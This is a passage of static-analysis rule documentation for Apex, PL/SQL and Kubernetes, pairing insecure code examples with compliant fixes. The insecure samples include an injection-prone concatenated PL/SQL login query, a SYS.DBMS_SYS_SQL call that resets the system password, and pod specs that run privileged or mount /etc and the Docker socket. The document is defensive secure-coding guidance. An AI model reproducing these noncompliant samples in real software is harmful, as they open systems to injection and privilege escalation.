Cookie c = new Cookie(COOKIENAME, sensitivedata);  // Sensitive: a security-sensitive cookie is created with the secure flag not defined (by default set to false)

Compliant Solution

Cookie c = new Cookie(COOKIENAME, sensitivedata);
c.setSecure(true); // Compliant: the sensitive cookie will not be send during an unencrypted HTTP request thanks to the secure flag set to true

See

apex:S5377

Why is this an issue?

By default Apex code executes without checking permissions. Hence the code will not enforce field level security, sharing rules and user permissions during execution of Apex code in Triggers, Classes and Controllers. This creates the risk that unauthorized users may get access to sensitive data records or fields.

To prevent this, developers should use with sharing keyword when declaring their classes if the class has SOQL or SOSL queries or DML Statements. This will ensure that current user’s permissions, field level security and sharing rules are enforced during code execution. Thus users will only see or modify records and fields which they have access to.

Use without sharing when a specific class should have full access to records without taking into account current user’s permissions. This should be used very carefully.

Use inherited sharing when the code should inherit the level of access from the calling class. This is more secure than not specifying a sharing level as the default will be equivalent to "with sharing".

This rule raises an issue when a class containing DML, SOSL or SOQL queries has no sharing level specified (with sharing, without sharing, inherited sharing).

Noncompliant code example

public class MyClass { // Noncompliant, no sharing specified
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id FROM Case WHERE Status = 'In Progress']){ // SOQL query
      // ...
  }
}

public class MyClass { // Noncompliant
  List<List<SObject>> sList = [FIND 'TEST' IN ALL FIELDS
                                      RETURNING Case(Name), Contact(FirstName,LastName)]; // SOSL query

}

public class MyClass { // Noncompliant
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id, Status FROM Case WHERE Status = 'In Progress']){
      c.Status = 'Closed';
      lstCasesToBeUpdated.add(c);
  }
  Update lstCasesToBeUpdated;  // DML query
}

Compliant solution

public with sharing class MyClass {
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id FROM Case WHERE Status = 'In Progress']){
      // ...
  }
}

public without sharing class MyClass {
  List<List<SObject>> sList = [FIND 'TEST' IN ALL FIELDS
                                      RETURNING Case(Name), Contact(FirstName,LastName)];
}

public inherited sharing class MyClass {
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id, Status FROM Case WHERE Status = 'In Progress']){
      c.Status = 'Closed';
      lstCasesToBeUpdated.add(c);
  }
  Update lstCasesToBeUpdated;
}

Exceptions

No issue will be raised for test classes, i.e. classes annotated with @isTest

Resources

apex:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

String password = 'xxxx'; // Sensitive

Compliant Solution

String password = retrievePassword();

See

apex:S5378

By default Apex code executes without checking permissions. Hence the code will not enforce field level security, sharing rules and user permissions during execution of Apex code in Triggers, Classes and Controllers. This creates the risk that unauthorized users may get access to sensitive data records or fields.

It is possible to specify different level of sharing via the keywords "with sharing", "without sharing" or "inherited sharing". The last two should be used very carefully as they can create security risks.

This rule raises an issue whenever a DML, SOSL or SOQL query is executed in a class marked as without sharing or inherited sharing.

Ask Yourself Whether

  • this code gives access to or modifies restricted records.
  • this code may be executed by users who shouldn’t have access to those records.
  • if the class is marked as inherited sharing, it may be called by a class marked as without sharing.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use with sharing whenever possible.
  • Use without sharing only after checking that the code is not accessible to unauthorized users.
  • Use inherited sharing only when all calling without sharing classes are safe.

Sensitive Code Example

public without sharing class MyClass {
  List<List<SObject>> sList = [FIND 'TEST' IN ALL FIELDS
                                      RETURNING Case(Name), Contact(FirstName,LastName)]; // Sensitive
}

public inherited sharing class MyClass {
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id, Status FROM Case WHERE Status = 'In Progress']){ // Sensitive
      c.Status = 'Closed';
      lstCasesToBeUpdated.add(c);
  }
  Update lstCasesToBeUpdated; // Sensitive
}

Compliant Solution

public with sharing class MyClass { // Compliant
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id FROM Case WHERE Status = 'In Progress']){
      // ...
  }
}

See

apex:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

String ip = '192.168.12.42'; // Sensitive
String clientIp = ApexPages.currentPage().getHeaders().get(‘True-Client-IP’);
Boolean isKnown = ip.equals(clientIp);

Compliant Solution

StaticResource sr= [SELECT ip_address FROM StaticResource WHERE Name = 'configuration' LIMIT 1]; // Compliant
String ip_address = sr.body.toString();
String clientIp = ApexPages.currentPage().getHeaders().get(‘True-Client-IP’);
Boolean isKnown = ip_address.equals(clientIp);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

plsql:S2070

This rule is deprecated; use S4790 instead.

Why is this an issue?

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the new, same-hash value gives an attacker the same access as if he had the originally-hashed value. This applies as well to the other Message-Digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160.

Consider using safer alternatives, such as SHA-256, SHA-512 or SHA-3.

Noncompliant code example

DBMS_CRYPTO.Hash(str, HASH_MD4);

DBMS_CRYPTO.Hash(str, HASH_MD5);

DBMS_CRYPTO.Hash(str, HASH_SH1);

Resources

plsql:SysOwnedFunctions

Why is this an issue?

Some Oracle packages contain powerful SYS-owned functions that can be used to perform malicious operations. For instance, DBMS_SYS_SQL.PARSE_AS_USER can be used to execute a statement as another user.

Most programs do not need those functions and this rule helps identify them in order to prevent security risks.

Noncompliant code example

DECLARE
  c INTEGER;
  sqltext VARCHAR2(100) := 'ALTER USER system IDENTIFIED BY hacker'; -- Might be injected by the user
BEGIN
  c := SYS.DBMS_SYS_SQL.OPEN_CURSOR();                               -- Noncompliant

   -- Will change 'system' user's password to 'hacker'
  SYS.DBMS_SYS_SQL.PARSE_AS_USER(c, sqltext, DBMS_SQL.NATIVE, UID);  -- Non-Compliant

  SYS.DBMS_SYS_SQL.CLOSE_CURSOR(c);                                  -- Noncompliant
END;
/

Resources

plsql:S1523

Executing code dynamically is security sensitive. It has led in the past to the following vulnerabilities:

Any code which is dynamically evaluated in your process will have the same permissions as the rest of your code. Thus it is very dangerous to do so with code coming from an untrusted source. Injected Code can either run on the server or in the client (exemple: XSS attack).

EXECUTE IMMEDIATE executes as a dynamic SQL statement or anonymous PL/SQL block the string passed as an argument. It’s safe only if the argument is composed of constant character string expressions. But if the command string is dynamically built using external parameters, then it is considered very dangerous because executing a random string allows the execution of arbitrary code.

This rule marks for review each occurence of dynamic code execution.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The best solution is to not run code provided by an untrusted source. If you really need to build a command string using external parameters, you should use EXECUTE IMMEDIATE with bind variables instead.

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Sensitive Code Example

CREATE OR REPLACE PROCEDURE ckpwd (p_user IN VARCHAR2, p_pass IN VARCHAR2)
IS
 v_query  VARCHAR2(100);
 v_output NUMBER;
BEGIN
 v_query :=    q'{SELECT COUNT(*) FROM user_pwd }'
         ||    q'{WHERE username = '}'
         ||    p_user
         ||    q'{' AND password = '}'
         ||    p_pass
         ||    q'{'}';
 EXECUTE IMMEDIATE v_query
  INTO v_output;
END;

Compliant Solution

CREATE OR REPLACE PROCEDURE ckpwd_bind (p_user IN VARCHAR2, p_pass IN VARCHAR2)
IS
 v_query  VARCHAR2(100);
 v_output NUMBER;
BEGIN
 v_query :=
   q'{SELECT COUNT(*) FROM user_pwd WHERE username = :1 AND password = :2}';
 EXECUTE IMMEDIATE v_query
  INTO v_output
  USING p_user, p_pass;
END;

See

plsql:S2278

This rule is deprecated; use S5547 instead.

Why is this an issue?

According to the US National Institute of Standards and Technology (NIST), the Data Encryption Standard (DES) is no longer considered secure:

Adopted in 1977 for federal agencies to use in protecting sensitive, unclassified information, the DES is being withdrawn because it no longer provides the security that is needed to protect federal government information.

Federal agencies are encouraged to use the Advanced Encryption Standard, a faster and stronger algorithm approved as FIPS 197 in 2001.

For similar reasons, RC2 should also be avoided.

Noncompliant code example

PLS_INTEGER := DBMS_CRYPTO.ENCRYPT_DES
                           + DBMS_CRYPTO.CHAIN_CBC
                           + DBMS_CRYPTO.PAD_PKCS5;

Compliant solution

PLS_INTEGER := DBMS_CRYPTO.ENCRYPT_AES256
                           + DBMS_CRYPTO.CHAIN_CBC
                           + DBMS_CRYPTO.PAD_PKCS5;

Resources

plsql:S5547

Why is this an issue?

Strong cipher algorithms are cryptographic systems resistant to cryptanalysis, they are not vulnerable to well-known attacks like brute force attacks for example.

A general recommendation is to only use cipher algorithms intensively tested and promoted by the cryptographic community.

More specifically for block cipher, it’s not recommended to use algorithm with a block size inferior than 128 bits.

Noncompliant code example

PLS_INTEGER := DBMS_CRYPTO.ENCRYPT_DES
                           + DBMS_CRYPTO.CHAIN_CBC
                           + DBMS_CRYPTO.PAD_PKCS5;

Compliant solution

PLS_INTEGER := DBMS_CRYPTO.ENCRYPT_AES256
                           + DBMS_CRYPTO.CHAIN_CBC
                           + DBMS_CRYPTO.PAD_PKCS5;

Resources

plsql:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

See

kubernetes:S6428

Running containers in privileged mode can reduce the resilience of a cluster in the event of a security incident because it weakens the isolation between hosts and containers.

Process permissions in privileged containers are essentially the same as root permissions on the host. If these processes are not protected by robust security measures, an attacker who compromises a root process on a Pod’s host is likely to gain the ability to pivot within the cluster.
Depending on how resilient the cluster is, attackers can extend their attack to the cluster by compromising the nodes from which the cluster launched the process.

Ask Yourself Whether

  • The services of this Pod are accessible to people who are not administrators of the Kubernetes cluster.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Disable privileged mode.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
      securityContext:
        privileged: true # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
      securityContext:
        privileged: false

See

kubernetes:S6433

Mounting sensitive file system paths can lead to information disclosure and compromise of the host systems.

System paths can contain sensitive information like configuration files or cache files. Those might be used by attackers to expand permissions or to collect information for further attacks. System paths can also contain binaries and scripts that might be executed by the host system periodically. A compromised or rogue container with access to sensitive files could endanger the integrity of the whole Kubernetes cluster.

Ask Yourself Whether

  • The mounted file path contains sensitive information.
  • The mounted file path contains configuration files or executables that are writable.
  • The Pod is untrusted or might contain vulnerabilities.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to avoid mounting sensitive system file paths into containers. If it is necessary to mount such a path due to the architecture, the least privileges should be given, for instance by making the mount read-only to prevent unwanted modifications.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container
    volumeMounts:
    - mountPath: /data
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /etc # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container
    volumeMounts:
    - mountPath: /data
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /mnt/nfs

See

kubernetes:S6431

Using host operating system namespaces can lead to compromise of the host systems.
These attacks would target:

  • host processes
  • host inter-process communication (IPC) mechanisms
  • network services of the local host system

These three items likely include systems that support either the internal operation of the Kubernetes cluster or the enterprise’s internal infrastructure.

Opening these points to containers opens new attack surfaces for attackers who have already successfully exploited services exposed by containers. Depending on how resilient the cluster is, attackers can extend their attack to the cluster by compromising the nodes from which the cluster started the process.

Host network sharing could provide a significant performance advantage for workloads that require critical network performance. However, the successful exploitation of this attack vector could have a catastrophic impact on confidentiality within the cluster.

Ask Yourself Whether

  • The services of this Pod are accessible to people who are not administrators of the Kubernetes cluster.
  • The cluster’s services performances do not rely on operating system namespaces.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not use host operating system namespaces.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
  hostPID: true     # Sensitive
  hostIPC: true     # Sensitive
  hostNetwork: true # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
  hostPID: false
  hostIPC: false
  hostNetwork: false

See

kubernetes:S6430

Allowing process privilege escalations exposes the Pod to attacks that exploit setuid binaries.

This field directly controls whether the no_new_privs flag is set in the container process.
When this flag is enabled, binaries configured with setuid or setgid bits cannot change their runtime uid or gid: Potential attackers must rely on other privilege escalation techniques to successfully operate as root on the Pod.

Depending on how resilient the Kubernetes cluster and Pods are, attackers can extend their attack to the cluster by compromising the nodes from which the cluster started the Pod.

The allowPrivilegeEscalation field should not be set to true unless the Pod’s risks related to setuid or setgid bits have been mitigated.

Ask Yourself Whether

  • This Pod is accessible to people who are not administrators of the Kubernetes cluster.
  • This Pod contains binaries with setuid or setgid capabilities.

There is a risk if you answered yes to all of these questions.

Recommended Secure Coding Practices

Disable privilege escalation.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
      securityContext:
        allowPrivilegeEscalation: true # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
      securityContext:
        allowPrivilegeEscalation: false

See

kubernetes:S6429

Exposing Docker sockets can lead to compromise of the host systems.

The Docker daemon provides an API to access its functionality, for example through a UNIX domain socket. Mounting the Docker socket into a container allows the container to control the Docker daemon of the host system, resulting in full access over the whole system. A compromised or rogue container with access to the Docker socket could endanger the integrity of the whole Kubernetes cluster.

Ask Yourself Whether

  • The Pod is untrusted or might contain vulnerabilities.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to never add a Docker socket as a volume to a Pod.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /var/run/docker.sock # Sensitive
      type: Socket

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container

See

kubernetes:S5849

Setting capabilities can lead to privilege escalation and container escapes.

Linux capabilities allow you to assign narrow slices of root's permissions to processes. A thread with capabilities bypasses the normal kernel security checks to execute high-privilege actions such as mounting a device to a directory, without requiring additional root privileges.

In a container, capabilities might allow to access resources from the host system which can result in container escapes. For example, with the capability SYS_ADMIN an attacker might be able to mount devices from the host system inside of the container.

Ask Yourself Whether

Capabilities are granted:

  • To a process that does not require all capabilities to do its job.
  • To a not trusted process.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Capabilities are high privileges, traditionally associated with superuser (root), thus make sure that the most restrictive and necessary capabilities are assigned.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container
    securityContext:
      capabilities:
        add: ["SYS_ADMIN"] # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container

See